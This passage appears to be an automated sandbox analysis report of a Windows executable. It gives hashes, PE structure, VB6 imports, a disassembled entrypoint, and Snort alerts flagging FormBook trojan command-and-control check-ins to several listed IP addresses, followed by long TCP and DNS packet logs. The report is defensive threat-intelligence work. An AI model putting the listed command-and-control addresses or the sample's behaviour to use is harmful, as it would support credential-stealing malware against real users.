                                                                                  Order-10236587458.exeGet hashmaliciousBrowse
                                                                                  • 142.250.184.65
                                                                                  RFQ_110199282773666355627277288.exeGet hashmaliciousBrowse
                                                                                  • 142.250.184.65
                                                                                  EMG 3.0.exeGet hashmaliciousBrowse
                                                                                  • 142.250.184.65
                                                                                  QUOTATION.xlsxGet hashmaliciousBrowse
                                                                                  • 142.250.184.65
                                                                                  VM_629904-26374.htmGet hashmaliciousBrowse
                                                                                  • 142.250.184.65
                                                                                  cm0Ubgm8Eu.exeGet hashmaliciousBrowse
                                                                                  • 142.250.184.65
                                                                                  caraganas.exeGet hashmaliciousBrowse
                                                                                  • 142.250.184.65
                                                                                  Notification 466022.xlsmGet hashmaliciousBrowse
                                                                                  • 142.250.184.65
                                                                                  Fax #136.xlsmGet hashmaliciousBrowse
                                                                                  • 142.250.184.65
                                                                                  Purchase Order22420.exeGet hashmaliciousBrowse
                                                                                  • 142.250.184.65
                                                                                  ceFlxYfe4F.exeGet hashmaliciousBrowse
                                                                                  • 142.250.184.65

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  No created / dropped files found

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):5.7197215966629225
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                  • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:211094.exe
                                                                                  File size:98304
                                                                                  MD5:a2bc516696c51f3afdd8721d6c782360
                                                                                  SHA1:2fa5f1d52a9a80b01972cf840b5a3ffffb6be0a4
                                                                                  SHA256:d86226973ffce253c068344a37b83a3e0460cb5331e0d3f0cde729aa62827761
                                                                                  SHA512:82e5706313cb867c798290a69a672999aa2221af26b094dd0d28a56a033726ecae704d5dc8ad464d1df074cf7569ceb31f206fecd41d65dd2f4acc68dbaeb94f
                                                                                  SSDEEP:1536:L1bLxrsrdLN6p9posIgfXBMkk3QC4FplR378FLq1XlKmbL:BLqLAp9pokxMgFplR38Y3L
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L....4.Y.................0...P......H........@....@

                                                                                  File Icon

                                                                                  Icon Hash:10b0b2095489f81e

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x401348
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                  DLL Characteristics:
                                                                                  Time Stamp:0x59AE34C3 [Tue Sep 5 05:23:15 2017 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:c6ebaa5f331077d9c6c3ae892d7a39ce

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  push 00404268h
                                                                                  call 00007FE96C9BC505h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  xor byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  inc eax
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax-535F8D54h], cl
                                                                                  sub al, ECh
                                                                                  dec edx
                                                                                  stosd
                                                                                  lahf
                                                                                  out dx, al
                                                                                  scasb
                                                                                  mov ch, F3h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add dword ptr [eax], eax
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  push esp
                                                                                  insb
                                                                                  je 00007FE96C9BC582h
                                                                                  insb
                                                                                  jnc 00007FE96C9BC587h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  dec esp
                                                                                  xor dword ptr [eax], eax
                                                                                  and cl, cl
                                                                                  mov esi, 711FD982h
                                                                                  in eax, dx
                                                                                  dec ebp
                                                                                  mov dword ptr [C50604FCh], eax
                                                                                  add dword ptr [esi-22h], edx
                                                                                  mov ch, byte ptr [edi-28C65A66h]
                                                                                  cmp ecx, dword ptr [ebx-48h]
                                                                                  mov ch, FAh
                                                                                  jle 00007FE96C9BC55Fh
                                                                                  jp 00007FE96C9BC4DBh
                                                                                  outsd
                                                                                  cmp cl, byte ptr [edi-53h]
                                                                                  xor ebx, dword ptr [ecx-48EE309Ah]
                                                                                  or al, 00h
                                                                                  stosb
                                                                                  add byte ptr [eax-2Dh], ah
                                                                                  xchg eax, ebx
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  cld
                                                                                  sub eax, 27E00000h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [62724100h], al
                                                                                  push 00000000h
                                                                                  or eax, 46000601h
                                                                                  dec edi
                                                                                  inc ebx
                                                                                  inc ecx
                                                                                  dec esp
                                                                                  dec ecx
                                                                                  add byte ptr [ecx], bl
                                                                                  add dword ptr [eax], eax

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x136e40x3c.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x2c72.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x30
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000xd8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x12af40x13000False0.437037417763data6.2436912522IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .data0x140000x19cc0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x160000x2c720x3000False0.409423828125data4.50112626635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  RT_ICON0x17dca0xea8data
                                                                                  RT_ICON0x175220x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 2763565, next used block 3552051
                                                                                  RT_ICON0x16fba0x568GLS_BINARY_LSB_FIRST
                                                                                  RT_ICON0x16cd20x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 3207626755, next used block 12467
                                                                                  RT_ICON0x16baa0x128GLS_BINARY_LSB_FIRST
                                                                                  RT_ICON0x165420x668data
                                                                                  RT_GROUP_ICON0x164e80x5adata
                                                                                  RT_VERSION0x161e00x308dataChineseChina

                                                                                  Imports

                                                                                  DLLImport
                                                                                  USER32.DLLHideCaret
                                                                                  MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                                                  Version Infos

                                                                                  DescriptionData
                                                                                  Translation0x0804 0x04b0
                                                                                  LegalCopyrightInternal Verify Number,88
                                                                                  InternalNameSKUMLERIERNE
                                                                                  FileVersion1.00
                                                                                  CompanyNameInternal Verify Number,88
                                                                                  LegalTrademarksInternal Verify Number,88
                                                                                  ProductNameTeltplsu
                                                                                  ProductVersion1.00
                                                                                  OriginalFilenameSKUMLERIERNE.exe

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  ChineseChina

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                  02/25/21-15:49:04.064583TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.634.102.136.180
                                                                                  02/25/21-15:49:04.064583TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.634.102.136.180
                                                                                  02/25/21-15:49:04.064583TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.634.102.136.180
                                                                                  02/25/21-15:49:04.204484TCP1201ATTACK-RESPONSES 403 Forbidden804974334.102.136.180192.168.2.6
                                                                                  02/25/21-15:49:09.474285TCP1201ATTACK-RESPONSES 403 Forbidden804974934.102.136.180192.168.2.6
                                                                                  02/25/21-15:49:24.992498TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.634.102.136.180
                                                                                  02/25/21-15:49:24.992498TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.634.102.136.180
                                                                                  02/25/21-15:49:24.992498TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.634.102.136.180
                                                                                  02/25/21-15:49:25.133006TCP1201ATTACK-RESPONSES 403 Forbidden804975134.102.136.180192.168.2.6
                                                                                  02/25/21-15:49:30.250902TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.634.98.99.30
                                                                                  02/25/21-15:49:30.250902TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.634.98.99.30
                                                                                  02/25/21-15:49:30.250902TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.634.98.99.30
                                                                                  02/25/21-15:49:30.390222TCP1201ATTACK-RESPONSES 403 Forbidden804975234.98.99.30192.168.2.6
                                                                                  02/25/21-15:49:35.694806TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6198.54.117.211
                                                                                  02/25/21-15:49:35.694806TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6198.54.117.211
                                                                                  02/25/21-15:49:35.694806TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6198.54.117.211
                                                                                  02/25/21-15:49:41.207811TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.618.189.205.91
                                                                                  02/25/21-15:49:41.207811TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.618.189.205.91
                                                                                  02/25/21-15:49:41.207811TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.618.189.205.91
                                                                                  02/25/21-15:49:46.746673TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.6199.79.62.169
                                                                                  02/25/21-15:49:46.746673TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.6199.79.62.169
                                                                                  02/25/21-15:49:46.746673TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.6199.79.62.169
                                                                                  02/25/21-15:50:03.338770TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.6185.230.60.102
                                                                                  02/25/21-15:50:03.338770TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.6185.230.60.102
                                                                                  02/25/21-15:50:03.338770TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.6185.230.60.102
                                                                                  02/25/21-15:50:14.098751TCP1201ATTACK-RESPONSES 403 Forbidden804976434.102.136.180192.168.2.6

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Feb 25, 2021 15:48:24.893784046 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:24.950808048 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:24.950964928 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:24.951699972 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.008614063 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.025301933 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.025373936 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.025415897 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.025437117 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.025466919 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.025510073 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.025569916 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.046997070 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.109159946 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.109416962 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.110708952 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.172595024 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.366941929 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.366987944 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.367011070 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.367031097 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.367062092 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.367183924 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.367233038 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.370872021 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.370913029 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.371051073 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.374882936 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.374922037 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.375049114 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.378856897 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.378895998 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.379014015 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.382847071 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.382886887 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.383028984 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.386208057 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.386245012 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.386413097 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.424439907 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.424484968 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.424638033 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.426333904 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.426373005 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.426485062 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.426554918 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.430352926 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.430393934 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.430495977 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.430531025 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.434340954 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.434385061 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.434663057 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.438359022 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.438399076 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.438570976 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.442317963 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.442362070 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.442518950 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.446342945 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.446378946 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.446490049 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.450381994 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.450421095 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.450472116 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.450500965 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.454277039 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.454317093 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.454452038 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.454483032 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.457855940 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.457896948 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.458045006 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.461452007 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.461494923 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.461616039 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.465009928 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.465058088 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.465181112 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.468590975 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.468632936 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.468741894 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.468817949 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.472181082 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.472228050 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.472352982 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.475821018 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.475863934 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.475989103 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.481808901 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.481848955 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.481952906 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.482027054 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.483354092 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.483395100 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.483474970 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.483532906 CET49727443192.168.2.6142.250.184.65
                                                                                  Feb 25, 2021 15:48:25.486443996 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.486485958 CET44349727142.250.184.65192.168.2.6
                                                                                  Feb 25, 2021 15:48:25.486608028 CET49727443192.168.2.6142.250.184.65

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Feb 25, 2021 15:47:57.409122944 CET5507453192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:47:57.440130949 CET53583778.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:47:57.458034039 CET53550748.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:47:58.435882092 CET5451353192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:47:58.492862940 CET53545138.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:47:59.435306072 CET6204453192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:47:59.486816883 CET53620448.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:00.198703051 CET6379153192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:00.250240088 CET53637918.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:01.007292032 CET6426753192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:01.008606911 CET4944853192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:01.055880070 CET53642678.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:01.070396900 CET53494488.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:02.944663048 CET6034253192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:03.002110958 CET53603428.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:03.982208014 CET6134653192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:04.047683001 CET53613468.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:05.828881025 CET5177453192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:05.880536079 CET53517748.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:07.745563030 CET5602353192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:07.794399977 CET53560238.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:09.107074976 CET5838453192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:09.155801058 CET53583848.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:10.051012993 CET6026153192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:10.100179911 CET53602618.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:11.207969904 CET5606153192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:11.259543896 CET53560618.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:12.113063097 CET5833653192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:12.161952019 CET53583368.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:13.752398968 CET5378153192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:13.809654951 CET53537818.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:14.910197973 CET5406453192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:14.958986998 CET53540648.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:16.192214012 CET5281153192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:16.240995884 CET53528118.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:17.214557886 CET5529953192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:17.266032934 CET53552998.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:18.221292019 CET6374553192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:18.270117044 CET53637458.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:23.946151018 CET5005553192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:24.011514902 CET53500558.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:24.826545954 CET6137453192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:24.891527891 CET53613748.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:34.158699989 CET5033953192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:34.207537889 CET53503398.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:53.157656908 CET6330753192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:53.216072083 CET53633078.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:54.784702063 CET4969453192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:54.847906113 CET53496948.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:56.018057108 CET5498253192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:56.032754898 CET5001053192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:56.069770098 CET53549828.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:56.089826107 CET53500108.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:58.103507996 CET6371853192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:58.166277885 CET53637188.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:58.715318918 CET6211653192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:58.790381908 CET53621168.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:59.246304035 CET6381653192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:59.303927898 CET53638168.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:59.852585077 CET5501453192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:59.894917965 CET6220853192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:48:59.901019096 CET53550148.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:48:59.966434956 CET53622088.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:00.459866047 CET5757453192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:00.526770115 CET53575748.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:01.243587017 CET5181853192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:01.303563118 CET53518188.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:02.725351095 CET5662853192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:02.786421061 CET53566288.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:03.297482014 CET6077853192.168.2.68.8.8.8
